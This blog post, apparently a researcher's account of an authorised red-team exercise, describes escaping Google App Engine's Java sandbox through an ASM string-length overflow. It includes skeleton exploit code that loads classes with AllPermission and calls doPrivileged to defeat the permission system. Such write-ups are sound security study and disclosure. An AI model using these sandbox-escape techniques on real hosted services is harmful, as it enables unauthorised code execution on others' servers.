How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit

Back in college, I was very interested in Java bytecode. When I got an internship at Google in 2013, I was skeptical of the security of the Java version of Google App Engine and got permission to spend the last week of my internship doing a mini red team exercise, trying to break into App Engine. This is the story of how I found a vulnerability and developed an exploit to break out of the App Engine sandbox and get arbitrary code execution on a Google server.

Background

One of the reasons I was skeptical was Java’s poor security track record. Java is unusual among programming languages in attempting to do in-process sandboxing with its Applet model, where trusted and untrusted code run within the same language runtime.

Back in the dark ages before JavaScript and WebAssembly took over the world, website authors who wanted to include nontrivial interactivity had to rely on browser plugins. Sun’s entry into the fray was Java Applets, a system that allowed website authors to include precompiled Java classfiles on their site. When the user viewed the embedding page, the browser sent that code to the Java Virtual Machine (JVM) installed on the user’s computer for execution.

In order to keep things secure, Java used a permission system to control what running code could and couldn’t do. Desktop applications were executed with all permissions by default, while Java applets ran with a very restrictive policy that prevented stuff like accessing the user’s local files.

Unfortunately, applets were still plagued with security vulnerabilities. One issue is that most of the Java runtime library is itself implemented in Java. Trusted and untrusted code run side by side in the same VM, with the only things separating them being the permission system and visibility modifiers (public, protected, private, etc.).

This means that a bug anywhere in the JVM or standard libraries is liable to become a security vulnerability. Additionally, the attack surface is huge. The Java 7 runtime included over 17,000 classes, a lot of places for bugs to creep in.

App Engine

However, App Engine’s job was actually harder in most respects than that of Java applets. Similar to applets, untrusted Java bytecode is being executed in a sandbox, just on Google’s servers rather than the user’s machine. However, App Engine also wanted to make things easy for programmers, which meant allowing them to code the same way they would a desktop application to the greatest extent possible. This meant that App Engine allowed access to all the dangerous APIs like setAccessible and custom classloaders that were forbidden to applets for security reasons.

The one thing App Engine had going for it compared to applets is that the APIs available to users were whitelisted, so you couldn’t just call all 17,000 classes in the runtime library by default, which greatly reduced the attack surface. However, the whitelist included all the interesting core APIs like reflection and classloaders that make security difficult.

To solve this problem, App Engine used a combination of static bytecode rewriting and dynamic wrapper functions. The APIs were classified into three groups for security purposes. Some APIs, like java/lang/String, are innocuous and always safe to call. Others are always forbidden, like most of the 17,000 classes in the runtime, which were never meant to be used by end users. However, the most interesting is the third group: APIs like reflection whose safety depends on how they are used.

The Java reflection API allows you to dynamically call functions with names and types specified at runtime. This makes static analysis impossible, since there’s no way to tell what functions are actually being called just from looking at the code. However, App Engine couldn’t just ban reflection either, since its use is ubiquitous in legitimate Java libraries.

The solution was to transparently rewrite all submitted code before it was executed. The bytecode rewriting pass statically replaced all calls to the reflection API with wrapper functions written by the App Engine team. These wrapper functions would check which function was being called at runtime, and either allow it, block it, or return another wrapper as appropriate. There is a lot of complexity in the implementation since it needed to be transparent to the user and still work if e.g. the reflection API was itself executed via reflection, but I assume it was done correctly.
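To make the wrapper idea concrete, here is a rough sketch of what a runtime-checked replacement for Method.invoke could look like. App Engine’s real wrappers were closed source, so everything here is an assumption for illustration: the GuardedReflection class, its denylist, and the choice to check only the declaring class are all hypothetical, and the sketch only covers the allow and block cases, not returning another wrapper.

```java
import java.lang.reflect.Method;
import java.util.Set;

// Hypothetical stand-in for a reflection wrapper; not App Engine's actual code.
final class GuardedReflection {
    // Illustrative denylist. A real system would more likely use an allowlist.
    private static final Set<String> BLOCKED_CLASSES =
            Set.of("java.lang.Runtime", "java.lang.ProcessBuilder");

    // The rewriting pass would replace calls to Method.invoke with calls to this method.
    static Object invoke(Method m, Object target, Object... args)
            throws ReflectiveOperationException {
        String owner = m.getDeclaringClass().getName();
        if (BLOCKED_CLASSES.contains(owner)) {
            // The decision is made at runtime, once the actual target is known.
            throw new SecurityException("blocked reflective call to " + owner + "." + m.getName());
        }
        return m.invoke(target, args);
    }
}
```

The important property is that the check happens when the call is made, which is the only point where the target method is actually known.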

Likewise, the classloader API allows you to define new classes at runtime by passing in an array of bytes with the code of the new class to be loaded. This is a rough Java equivalent of the infamous eval function of languages like Python or JavaScript. Again, classloaders have legitimate uses, but they also completely defeat static analysis. Therefore, the bytecode rewriting replaced all custom classloaders with a wrapper function that performed the bytecode rewriting step at runtime on every dynamically defined class prior to loading.

Bytecode rewriting

In order to insert these wrappers as appropriate, App Engine used the popular open source bytecode manipulation library ASM to transform the user’s code before actually executing it. (The bytecode rewriting also did other things like ensure that request timeouts are handled appropriately, but it’s the security wrappers that matter for our purposes.)

Note: ASM is an open source library that can parse and re-serialize Java classfiles, and provides an API for analyzing and making changes to the bytecode before writing it out again. The actual bytecode rewriting logic was closed source and custom written by the App Engine team. However, to simplify things, I’ll sometimes refer to App Engine’s bytecode rewriting pass as “ASM”, even though that code was not actually part of the ASM library.

The rough flow when you upload Java code to App Engine went like this:

1) User uploads binary classfiles to App Engine server
2) Classfiles are parsed by ASM 
-> (ASM's in memory representation of the code)
3) Various code transformations using ASM
-> (ASM's in memory representation of the sanitized code)
4) ASM writes the code back out as binary classfiles
5) The binaries output by ASM are executed on the JVM
-> (JVM's in memory representation of code)

As alluded to above, the API wrapping is pretty complicated. However, I decided to just assume it was all implemented correctly and not bother hunting for bugs there since I was lazy and more interested in using my knowledge of low level Java bytecode. Besides, the actual wrapper code sat on Google’s servers, so if there were vulnerabilities there, a real attacker could only find them by trial and error anyway.

Note: This assumption turned out to not be entirely correct. A year or two later, App Engine received a vulnerability report from an external security researcher who discovered a dangerous API method that they forgot to wrap properly.

Instead, I decided it would be more fun (and more realistic) to hunt for bugs in the open source ASM library in order to completely bypass the bytecode rewriting. The key is the gap between steps 3 and 5 in the above flow.

Assuming the bytecode rewriting is implemented correctly, there is an invariant that the output of step 3 is always safe to execute. However, the output of step 3 is not directly executed. Instead, ASM serializes its in-memory representation of the sanitized code to a binary classfile, and then that binary file is passed to the JVM, which re-parses and executes it. This means that any difference between what ASM thinks it is writing out and how the JVM actually parses the file is a potential way to bypass the bytecode transformations and thus the security checks.

The pre-45.3 short code hack

Therefore, I reviewed the open source ASM serialization code to look for bugs. However, the first idea I had for a vulnerability was not something found in the ASM source, but rather, something that wasn’t in the source.

Java has a strong backwards compatibility story. You can take classfiles compiled in the very first version of Java and run them on a JVM today and they will usually still work. In fact, old and new code are freely interoperable even without recompilation - you can write code calling into an ancient binary and have it call back to you, etc.

In order to make the Java classfile format backwards compatible, each classfile starts with a version field that tells the JVM how to parse the rest of the classfile. The version numbers roughly correspond to Java releases, except that they inexplicably started the numbering at 45 and there’s some oddity with the early versions. Java 1.02 (the first stable release of Java) used bytecode version 45.3, Java 5 is version 49.0, Java 6 is 50.0, Java 7 is 51.0, etc.
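As a small illustration, the version can be read straight out of the first eight bytes of any classfile: a four byte magic number (0xCAFEBABE), then the minor version, then the major version, all big-endian. The ClassfileVersion helper below is just a name I made up for this sketch.

```java
import java.nio.ByteBuffer;

// Illustrative helper: reads the version field from a classfile header.
final class ClassfileVersion {
    /** Returns {major, minor} from the first 8 bytes of a classfile. */
    static int[] read(byte[] classfile) {
        ByteBuffer buf = ByteBuffer.wrap(classfile); // ByteBuffer is big-endian by default
        int magic = buf.getInt();
        if (magic != 0xCAFEBABE) {
            throw new IllegalArgumentException("not a classfile");
        }
        int minor = buf.getShort() & 0xFFFF; // the minor version is stored first
        int major = buf.getShort() & 0xFFFF;
        return new int[] {major, minor};
    }
}
```

For a header of cafe babe 0000 0031, this yields major 49 and minor 0, i.e. version 49.0.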

Although the first stable release of Java used bytecode version 45.3, the JVM will actually accept classfiles with versions starting at 45.0. Furthermore, there’s an undocumented feature in the JVM where it parses Code attributes slightly differently when the version is 45.0 - 45.2.

Since this feature was completely undocumented (I only discovered it by chance, looking at the JVM source code), the only bytecode tools that handled it were the ones I wrote myself. Everything else treated pre-45.3 classfiles in the same way as normal (45.3+) classfiles. Even Oracle’s own javap tool didn’t handle this, so it’s unsurprising that ASM didn’t either.

In a normal classfile, the stack, locals, and code length fields of the Code attribute have lengths of 2, 2, and 4 bytes respectively, but in a pre-45.3 classfile, the JVM expects them to be 1, 1, and 2 bytes instead. Normally, this means that a pre-45.3 classfile produced by ASM will just crash when run on the JVM because the JVM encounters garbage data while parsing and rejects it.
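The difference between the two layouts is easy to see by parsing the same bytes both ways. The sketch below only handles the three fields discussed here and assumes the input starts at the stack field (after the attribute name and length); the CodeHeader class is a made-up name for illustration.

```java
import java.nio.ByteBuffer;

// Illustrative parser for the first three fields of a Code attribute body.
final class CodeHeader {
    final int maxStack;
    final int maxLocals;
    final long codeLength;

    CodeHeader(int maxStack, int maxLocals, long codeLength) {
        this.maxStack = maxStack;
        this.maxLocals = maxLocals;
        this.codeLength = codeLength;
    }

    // Layout for version 45.3 and later: widths of 2, 2, and 4 bytes.
    static CodeHeader parseModern(byte[] data) {
        ByteBuffer buf = ByteBuffer.wrap(data);
        int stack = buf.getShort() & 0xFFFF;
        int locals = buf.getShort() & 0xFFFF;
        long length = buf.getInt() & 0xFFFFFFFFL;
        return new CodeHeader(stack, locals, length);
    }

    // Layout for versions 45.0 - 45.2: widths of 1, 1, and 2 bytes.
    static CodeHeader parseLegacy(byte[] data) {
        ByteBuffer buf = ByteBuffer.wrap(data);
        int stack = buf.get() & 0xFF;
        int locals = buf.get() & 0xFF;
        long length = buf.getShort() & 0xFFFF;
        return new CodeHeader(stack, locals, length);
    }
}
```

Given the bytes 00 02 00 01 00 00 00 09, the modern parse sees stack 2, locals 1, and 9 bytes of code, while the legacy parse sees stack 0, locals 2, and a single byte of code starting four bytes earlier.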

However, if you are very careful, it is possible to construct a classfile that is valid when parsed with the 2,2,4 widths, and also valid when parsed with 1,1,2, but parses as different code in each case. This means that it is possible to craft a classfile that executes one piece of code when run on the actual JVM and displays a completely different set of fake code when viewed with reverse engineering tools, as I demonstrated here.

Note: This feature was later removed in October 2019. It appears that someone filed a bug report requesting that javap add support for pre-45.3 classfiles, and instead, they decided to just remove the feature from the JVM entirely.

Unfortunately, this issue turned out to not be exploitable in App Engine because the bytecode rewriting coincidentally set the version to a minimum of 49.0. This was not done for security reasons, but because the rewriting sometimes added code that used version 49.0 features, so they decided to just unconditionally update the classfile version to a minimum of 49.0. Luckily, it didn’t take long to find another, even simpler bug in ASM.

String length overflow

Whenever Java bytecode needs to reference a string, the string data is stored as a two byte length field, followed by that many bytes of string data. However, ASM doesn’t do any overflow checking when writing out length fields (or rather didn’t back in 2013). Therefore, if ASM is told to write out, say, a 65536 byte string, instead of throwing an error, it will just silently overflow and write out 0 as the length, followed by those 65536 bytes of string data. Then when the JVM parses the classfile, it will see a 0 length string, and then move on to parsing whatever it was going to parse next, starting with those 65536 bytes of string data.
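The effect of the missing check can be reproduced in a few lines. This is not ASM’s actual code, just a stand-in writer (NaiveUtf8Writer is a made-up name) that emits a two byte length followed by the data without checking that the length fits.

```java
import java.io.ByteArrayOutputStream;

// Illustrative stand-in for a serializer with no overflow check; not ASM's code.
final class NaiveUtf8Writer {
    /** Writes a two byte big-endian length followed by the already-encoded bytes. */
    static byte[] write(byte[] encoded) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        int len = encoded.length;
        out.write(len >>> 8); // write(int) keeps only the low 8 bits,
        out.write(len);       // so anything above 16 bits is silently dropped
        out.write(encoded, 0, encoded.length);
        return out.toByteArray();
    }

    /** Reads back the length field the way a parser would. */
    static int declaredLength(byte[] entry) {
        return ((entry[0] & 0xFF) << 8) | (entry[1] & 0xFF);
    }
}
```

With 65535 bytes of input the declared length is 65535 as expected, but with 65536 bytes it wraps around to 0 while all 65536 data bytes are still written out after it.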

This is a pretty promising bug, but it’s not quite enough to exploit by itself. The issue is that we don’t have any way to directly produce such an oversized string. Recall that the flow goes like this:

1) User uploads binary classfiles to App Engine server
2) Classfiles are parsed by ASM 
-> (ASM's in memory representation of the code)
3) Various code transformations using ASM
-> (ASM's in memory representation of the sanitized code)
4) ASM writes the code back out as binary classfiles
5) The binaries output by ASM are executed on the JVM
-> (JVM's in memory representation of code)

We want to somehow ensure there’s a long string in ASM’s in memory representation of the sanitized code when we get to step 4. However, we don’t have any direct control over the input to step 4. The only thing we control directly is step 1, the files we upload to the server.

Since the input we send to App Engine in step 1 is a set of binary classfiles, and classfiles can’t represent a string that’s more than 65535 bytes long, it seems that all the strings in steps 2 and 3 must be <= 65535 bytes, leaving no way to actually trigger the overflow bug in step 4. Or is there?

The trick is that the files we upload are never actually seen by the JVM. That means they don’t have to be strictly valid classfiles. We can upload any file we like as long as it looks enough like a classfile for ASM to parse it. Which leads to a second bug I found in ASM’s string handling.

In the classfile format, constant string data is stored in the MUTF-8 encoding. This is the same as the ubiquitous UTF-8 encoding, with two minor differences. The first (astral characters are stored as surrogate pairs) doesn’t matter for our purposes. However, the second difference is that in the UTF-8 encoding, null characters are stored as is, as a single null byte. In MUTF-8, by contrast, they are encoded as a two byte sequence, the same way that codepoints U+0080 through U+07FF are treated in normal UTF-8. This has the advantage that a MUTF-8 encoded string will never contain literal null bytes, allowing the use of C string functions.
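You can see the difference from within Java itself, because DataOutputStream.writeUTF uses the same modified encoding (prefixed with a two byte length, which the sketch below strips off). The NullEncoding class is just an illustrative wrapper.

```java
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

// Illustrative comparison of standard UTF-8 and the modified form.
final class NullEncoding {
    static byte[] standardUtf8(String s) {
        return s.getBytes(StandardCharsets.UTF_8);
    }

    static byte[] modifiedUtf8(String s) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (DataOutputStream out = new DataOutputStream(bytes)) {
            out.writeUTF(s); // two byte length, then modified UTF-8 data
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        byte[] all = bytes.toByteArray();
        return Arrays.copyOfRange(all, 2, all.length); // drop the length prefix
    }
}
```

For the one character string "\0", standardUtf8 produces the single byte 00, while modifiedUtf8 produces the two bytes C0 80.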

ASM of course encodes everything in MUTF-8 when writing out a classfile (otherwise it wouldn’t work at all). However, ASM’s classfile parser is more liberal in what it will accept. It will accept both literal null bytes and the correct two byte encoding and convert them both to null characters for the constant strings in the in-memory code representation (stored as ordinary Java Strings, which use UTF-16 encoding).

This means that if you feed ASM an almost valid classfile that is correct except for containing literal null bytes in strings, it is possible to trigger the overflow bug. For example, if the input classfile contains a string of length 32768, where the data is 32768 null bytes, the parser will convert that to a string of 32768 null characters in-memory. Then when it writes it back out to a classfile, it will encode the in-memory strings into MUTF-8, resulting in an encoding that is 32768 * 2 = 65536 bytes long. When it tries to write this out, the length field will then overflow to 0.
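The arithmetic can be checked with a small model of the round trip. This is my own simplified sketch, not ASM’s parser: decodeLenient only understands one and two byte sequences and, like the behavior described above, accepts a raw null byte, while encodedLength counts how many bytes the MUTF-8 encoding of a string needs.

```java
// Simplified model of the lenient parse and strict re-encode; not ASM's code.
final class NullDoubling {
    /** Decodes 1- and 2-byte sequences, accepting a literal 0x00 byte as U+0000. */
    static String decodeLenient(byte[] data) {
        StringBuilder sb = new StringBuilder(data.length);
        int i = 0;
        while (i < data.length) {
            int b = data[i] & 0xFF;
            if (b < 0x80) {
                sb.append((char) b); // includes the raw null byte
                i += 1;
            } else if ((b & 0xE0) == 0xC0 && i + 1 < data.length) {
                sb.append((char) (((b & 0x1F) << 6) | (data[i + 1] & 0x3F)));
                i += 2;
            } else {
                throw new IllegalArgumentException("unsupported byte sequence at " + i);
            }
        }
        return sb.toString();
    }

    /** Number of bytes needed to encode s as MUTF-8. */
    static int encodedLength(String s) {
        int n = 0;
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c >= 0x0001 && c <= 0x007F) {
                n += 1;
            } else if (c <= 0x07FF) {
                n += 2; // U+0000 lands here and takes two bytes
            } else {
                n += 3;
            }
        }
        return n;
    }
}
```

Feeding 32768 raw null bytes through decodeLenient gives a 32768 character string, encodedLength of that string is 65536, and 65536 & 0xFFFF is 0, which is the value that ends up in the two byte length field.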

Exploit structure

Now that we’ve found a vulnerability, there’s the question of how to actually write an exploit for it. We will have to carefully craft an (invalid) classfile that appears innocuous, but after transformation by ASM, will get re-parsed by the JVM as malicious code.

Obviously, doing this is a pain, so we want to put as little code as possible in the exploit classfile in order to make things easier. Therefore, I decided to just put a minimal custom classloader in my exploit class, which can then be called from “safe” code to load arbitrary code and continue the exploitation process.

Therefore, we want something along the lines of this:

public class Main {
    public static void main(String[] args) throws Throwable {
        Exploit e = new Exploit();
        byte[] payload_bytecode = /* bytes for the Payload classfile */;

        Class payload_class = e.sneakyLoad(payload_bytecode);
        Method m = payload_class.getMethod("doEvilStuff");
        m.invoke(null);
    }
}

public class Exploit extends ClassLoader {
    public Class sneakyLoad(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}

public class Payload {
    public static void doEvilStuff() {
        // evil stuff here
    }
}

Here, we have three classes: Main, Exploit, and Payload. Of these, Exploit is the only class that we need to craft by hand to bypass ASM, and it contains minimal code.

The Main class is where all the other setup code goes. We can write it in ordinary Java because it is safe from ASM’s perspective. All it does is call into our Exploit class. The Exploit class contains a classloader and a method to load a class from arbitrary bytes. Normally, ASM would have rewritten the sneakyLoad method to call ASM’s wrappers for the ClassLoader API, which would in turn apply the ASM bytecode rewriting at runtime to whatever bytecode is passed into sneakyLoad. However, since the Exploit class bypassed the bytecode rewriting, there are no wrappers added, so sneakyLoad allows us to load arbitrary code without going through ASM again.

The Main class then calls sneakyLoad to load the Payload class, where we can put the rest of the code, for whatever we want to do after exploitation. The Payload class can also be written in ordinary Java since ASM never sees it in the first place.

Note: I do not have any of the files from the original hack in 2013, so all code seen here was recreated for the sake of this blog post, and is similar but not identical to the original exploit code. The skeleton shown here is particularly simplified. For example, in the actual App Engine, you are writing a web server, so the application entry point is a web request handler, while what I’ve shown here uses the main() method like a command line application.

Permissions

Unfortunately, the outline above doesn’t quite work. We still have to contend with the permission system.

Recall that the Java permission system is designed to do stuff like prevent applets from reading your local files. All Java code has an associated security policy with various permissions. Desktop applications are run with all permissions by default, while Java applets were run with a very restrictive set of permissions by default.

Naturally, the App Engine team decided to use the permission system as a defence in depth measure, by running user code with the most restrictive permission set possible. Even if we bypass the ASM bytecode rewriting, there’s still the fact that we don’t have permission to actually do much.

Luckily, it turns out to be easy to bypass the permission system. The key is that some permissions, such as the classloader permission, render all others irrelevant. This is because when you define a custom classloader, you can choose which permissions to assign to any class you load with it, and you can grant to the loaded classes even permissions you yourself do not possess. This is not a security bug - it’s the officially documented behavior.

For Java applets, this didn’t matter because applets weren’t granted the classloader permission in the first place. However, App Engine enables users to use custom classloaders. They made it safe by using bytecode rewriting to insert wrappers and enforce security checks. However, from the JVM’s perspective, the wrapped code is still ultimately calling a classloader under the hood. That means that among the few permissions granted to the user code, they had to grant the classloader permission and just rely purely on ASM to ensure the security of user defined classloaders.

This means that if we manage to bypass ASM and define an unrestricted classloader, it’s trivial to also bypass the permission system. However, we still have to add the code to actually do that.

We’ll start with the Exploit class, where we want to add as little code as possible. Luckily, setting the permissions on loaded classes is just a matter of adding a ProtectionDomain parameter (plus the name parameter the API also requires). We’ll just pass through the parameter, and let the Main class do the heavy lifting of actually creating the ProtectionDomain.

public class Exploit extends ClassLoader {
    public Class sneakyLoad(String name, byte[] b, ProtectionDomain pd) {
        return this.defineClass(name, b, 0, b.length, pd);
    }
}

Next, we update Main to create a ProtectionDomain with AllPermission and pass it in. Note that Main is sent “in the clear”, but ASM doesn’t care about any of the permission stuff, since we’re just calling Exploit.sneakyLoad. From ASM’s perspective, every individual user class goes through the same bytecode rewriting and thus is safe to call, so it doesn’t matter how we call sneakyLoad.

As long as we don’t call ClassLoader.defineClass directly in Main, ASM won’t mess with it. Or rather, it won’t mess with it in any way that matters - it will still wrap the reflection calls we use to call Payload.doEvilStuff after loading it, but since Payload is our own class, and thus presumed to have gone through the same bytecode rewriting process and be safe to call, the reflection wrappers will let the calls to Payload go through without complaint.

public class Main {
    public static void main(String[] args) throws Throwable {
        Exploit e = new Exploit();
        byte[] payload_bytecode = /* bytes for the Payload classfile */;

        PermissionCollection pc = new Permissions();
        pc.add(new AllPermission());
        ProtectionDomain pd = new ProtectionDomain(null, pc);

        Class payload_class = e.sneakyLoad("Payload", payload_bytecode, pd);
        Method m = payload_class.getMethod("doEvilStuff");
        m.invoke(null);
    }
}

Now we’ve granted AllPermission to the Payload class, but there’s still one more step left. Java is designed for untrusted and trusted code to run side by side. In order to reduce the risk of security vulnerabilities in (trusted) standard library code when called by untrusted code, the security manager scans the entire call stack when doing a permission check and will throw an error if any function in the call stack is missing the required permission.

Obviously, some privileged APIs are designed to be called from untrusted code, and therefore need to be able to vouch for their callers. The way to do this is to call AccessController.doPrivileged, which says “I’ve verified whatever conditions are required to ensure that the request from my (untrusted) caller is safe, so go ahead and do what I say using only my own permissions”. When the security manager scans the call stack during a permission check, it stops at the first call to AccessController.doPrivileged, instead of scanning the entire stack.

Therefore, we need to add a call to AccessController.doPrivileged to the Payload class and then implement the PrivilegedAction interface and move the actual evil code into its run method, which is done as follows:

public class Payload implements PrivilegedAction {
    public static void doEvilStuff() throws Throwable {
        AccessController.doPrivileged(new Payload());
    }

    public Object run() {
        // evil stuff here
        return null;
    }
}

Java bytecode

Now that we’ve identified the exploitable vulnerabilities in ASM and decided exactly what code we want to sneak past ASM, we have to do the hard part of actually crafting the class to bypass ASM. Unfortunately, this requires explaining a lot about the details of Java classfiles and Java bytecode, but I’ll do my best to keep it simple.

When you write Java code, you have to compile it into classfiles before you can execute it on the JVM. A minimal classfile to print “Hello World!” looks like this:

00000000: cafe babe 0000 0031 0016 0800 1507 0014  .......1........
00000010: 0700 1301 0004 6d61 696e 0100 1628 5b4c  ......main...([L
00000020: 6a61 7661 2f6c 616e 672f 5374 7269 6e67  java/lang/String
00000030: 3b29 5601 0004 436f 6465 0900 0e00 0f0a  ;)V...Code......
00000040: 0009 000a 0700 0d0c 000b 000c 0100 0770  ...............p
00000050: 7269 6e74 6c6e 0100 1528 4c6a 6176 612f  rintln...(Ljava/
00000060: 6c61 6e67 2f4f 626a 6563 743b 2956 0100  lang/Object;)V..
00000070: 136a 6176 612f 696f 2f50 7269 6e74 5374  .java/io/PrintSt
00000080: 7265 616d 0700 120c 0010 0011 0100 036f  ream...........o
00000090: 7574 0100 154c 6a61 7661 2f69 6f2f 5072  ut...Ljava/io/Pr
000000a0: 696e 7453 7472 6561 6d3b 0100 106a 6176  intStream;...jav
000000b0: 612f 6c61 6e67 2f53 7973 7465 6d01 0010  a/lang/System...
000000c0: 6a61 7661 2f6c 616e 672f 4f62 6a65 6374  java/lang/Object
000000d0: 0100 0a48 656c 6c6f 576f 726c 6401 000c  ...HelloWorld...
000000e0: 4865 6c6c 6f20 576f 726c 6421 0001 0002  Hello World!....
000000f0: 0003 0000 0000 0001 0009 0004 0005 0001  ................
00000100: 0006 0000 0015 0002 0001 0000 0009 b200  ................
00000110: 0712 01b6 0008 b100 0000 0000 00         .............

You can run this classfile on the JVM just like a normal compiled classfile. The JVM doesn’t care where classfiles come from as long as they are structurally valid. Normally, you get classfiles by compiling Java code, but you can also compile them from other languages or even produce them by hand.

$ java HelloWorld
Hello World!

Note: Compiled Java code is referred to as bytecode because each instruction opcode is only one byte. A classfile contains both bytecode instructions and various metadata that they rely on, but I’ll refer to the entire classfile as “bytecode” for simplicity.

Krakatau

When I first got interested in Java bytecode in the summer of 2012, I started by reading the Java classfile specification, then worked out with pencil and paper the bytes needed for the code I wanted and typed them directly into a hex editor. I created a Hello World class this way, as well as my first and second Java crackmes. However, doing so is a painful and tedious process that I would not recommend anyone try more than once or twice as a learning experience.

When it came time to write my third, much larger and more ambitious crackme, I realized there was no way I could possibly do it all by hand, and thus needed an assembler, a tool that converts a high level textual representation of Java bytecode into an actual binary classfile while abstracting away tedious encoding details.

At the time, there were no good assemblers for Java bytecode (the sole contender, Jasmin, was very old, unmaintained, poorly documented, and full of bugs and missing features). Therefore, I wrote my own, Krakatau. I also wrote a disassembler, which converts a binary classfile back into the textual representation, making it much easier to debug issues when working with bytecode (as well as making it easier to reverse engineer Java applications in general).

With the Krakatau assembler, you can write the following in a text file and Krakatau will convert it to the binary classfile seen above.

.class public HelloWorld
.super java/lang/Object

.method public static main : ([Ljava/lang/String;)V
    .code stack 2 locals 1
        getstatic Field java/lang/System out Ljava/io/PrintStream;
        ldc "Hello World!"
        invokevirtual Method java/io/PrintStream println (Ljava/lang/Object;)V
        return
    .end code
.end method

Note: I completely rewrote the Krakatau assembler in 2015, changing the syntax slightly in the process in order to simplify it and add features that were impossible to support with the old syntax. All the examples of Krakatau assembly here use the current syntax, rather than the syntax of Krakatau as it existed in 2013.

This is roughly equivalent to the following Java code, minus a bunch of junk the Java compiler adds which we don’t need.

public class HelloWorld {
    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}

As you can see from the Krakatau assembly file above, Java bytecode is relatively high level and similar to Java, compared to traditional machine code. However, you can see a few notable differences from Java here:

There are no imports or package declarations at the bytecode level, even the implicit import of java.lang.*. All types are always fully qualified in bytecode (e.g. java.lang.String instead of just String). Furthermore, bytecode uses / as the package separator rather than ., so String actually becomes java/lang/String.
In Java, classes with no explicit superclass implicitly inherit from java.lang.Object. In bytecode, you have to list the superclass explicitly.
In bytecode, methods are explicitly qualified by the containing class and descriptor. The descriptor is a string encoding the types of a method’s parameters and its return type. The simplest descriptor is ()V, a method taking no arguments and returning void. Primitive types are encoded as a single letter (V for void, I for int, etc.). Class types are encoded as LFoo;, where Foo is the name of the class. Finally, array types are encoded as [ followed by the base type. Therefore, the descriptor ([Ljava/lang/String;)V means a method that takes a single parameter of type String[] and returns void, which is the signature of our main method.
Fields are also qualified by the containing class and descriptor. For fields, the descriptor is just the type of the field. Therefore, instead of writing System.out as you would in Java, you instead write (in Krakatau assembly syntax) getstatic Field java/lang/System out Ljava/io/PrintStream;. This is saying “get the field in class java.lang.System named out with type java.io.PrintStream.”
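If you want to experiment with these encodings without an assembler, the standard library can produce them for you. The sketch below uses java.lang.invoke.MethodType to build method descriptors and a simple string replace to get the slash-separated class name; the Descriptors class is just a wrapper I made up for the example.

```java
import java.lang.invoke.MethodType;

// Illustrative helpers for bytecode-level names and descriptors.
final class Descriptors {
    /** Converts a class to its bytecode-level name, e.g. java/lang/String. */
    static String internalName(Class<?> c) {
        return c.getName().replace('.', '/');
    }

    /** Builds a method descriptor from a return type and parameter types. */
    static String methodDescriptor(Class<?> returnType, Class<?>... params) {
        return MethodType.methodType(returnType, params).toMethodDescriptorString();
    }
}
```

For example, methodDescriptor(void.class, String[].class) gives ([Ljava/lang/String;)V, the descriptor of main, and methodDescriptor(void.class) gives ()V.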

The constant pool

Whenever bytecode refers to a constant, that constant is not stored inline as part of the instruction. Instead, classfiles contain a constant pool, a list of all constants referenced by the classfile, at the beginning of the classfile, and bytecode instructions just contain an index into the classfile’s constant pool. For example, with the ldc "Hello World!" instruction above, the string “Hello World!” is not stored as part of the instruction. Instead, the instruction encoding is two bytes: first the ldc opcode (0x12, i.e. 18 in decimal) followed by an index into the constant pool. Likewise, the fields and methods referenced by getstatic and invokevirtual are entries in the constant pool.
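To show how little is stored in the instructions themselves, here is a toy disassembler for the nine bytes of code at the end of the hex dump above (b2 00 07 12 01 b6 00 08 b1). It only knows the four opcodes used in that method, and MiniDisassembler is a made-up name; a real disassembler like Krakatau handles the full instruction set.

```java
import java.util.ArrayList;
import java.util.List;

// Toy disassembler covering only the four opcodes used in the Hello World method.
final class MiniDisassembler {
    static List<String> disassemble(byte[] code) {
        List<String> out = new ArrayList<>();
        int pc = 0;
        while (pc < code.length) {
            int op = code[pc] & 0xFF;
            switch (op) {
                case 0x12: // ldc: opcode plus a one byte constant pool index
                    out.add(pc + ": ldc #" + (code[pc + 1] & 0xFF));
                    pc += 2;
                    break;
                case 0xB2: // getstatic: opcode plus a two byte constant pool index
                    out.add(pc + ": getstatic #" + index16(code, pc + 1));
                    pc += 3;
                    break;
                case 0xB6: // invokevirtual: opcode plus a two byte constant pool index
                    out.add(pc + ": invokevirtual #" + index16(code, pc + 1));
                    pc += 3;
                    break;
                case 0xB1: // return: no operands
                    out.add(pc + ": return");
                    pc += 1;
                    break;
                default:
                    throw new IllegalArgumentException("unsupported opcode at " + pc);
            }
        }
        return out;
    }

    private static int index16(byte[] code, int at) {
        return ((code[at] & 0xFF) << 8) | (code[at + 1] & 0xFF);
    }
}
```

Running it on those nine bytes yields getstatic #7 at offset 0, ldc #1 at offset 3, invokevirtual #8 at offset 5, and return at offset 8. The actual field, string, and method are only identified by their constant pool indexes.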

Krakatau allows you to specify the constants inline for readability and convenience when writing bytecode, and the assembler will implicitly add those to the constant pool as necessary. However, it also lets you specify constant pool entries explicitly. If we disassemble the above classfile, we can see the generated constant pool, converted to explicit constant pool entries in Krakatau syntax by the disassembler:

.version 49 0 
.const [1] = String [21] 
.const [2] = Class [20] 
.const [3] = Class [19] 
.const [4] = Utf8 main 
.const [5] = Utf8 ([Ljava/lang/String;)V 
.const [6] = Utf8 Code 
.const [7] = Field [14] [15] 
.const [8] = Method [9] [10] 
.const [9] = Class [13] 
.const [10] = NameAndType [11] [12] 
.const [11] = Utf8 println 
.const [12] = Utf8 (Ljava/lang/Object;)V 
.const [13] = Utf8 java/io/PrintStream 
.const [14] = Class [18] 
.const [15] = NameAndType [16] [17] 
.const [16] = Utf8 out 
.const [17] = Utf8 Ljava/io/PrintStream; 
.const [18] = Utf8 java/lang/System 
.const [19] = Utf8 java/lang/Object 
.const [20] = Utf8 HelloWorld 
.const [21] = Utf8 'Hello World!' 

.class public [2] 
.super [3] 

.method public static [4] : [5] 
    .attribute [6] .code stack 2 locals 1 
L0:     getstatic [7] 
L3:     ldc [1] 
L5:     invokevirtual [8] 
L8:     return 
L9:     
    .end code 
.end method 
.end class 

Note: Krakatau requires that the .const directives come after the .class directive. However, I moved them to the beginning in this example to reflect the order they actually appear in the classfile in order to avoid confusion.

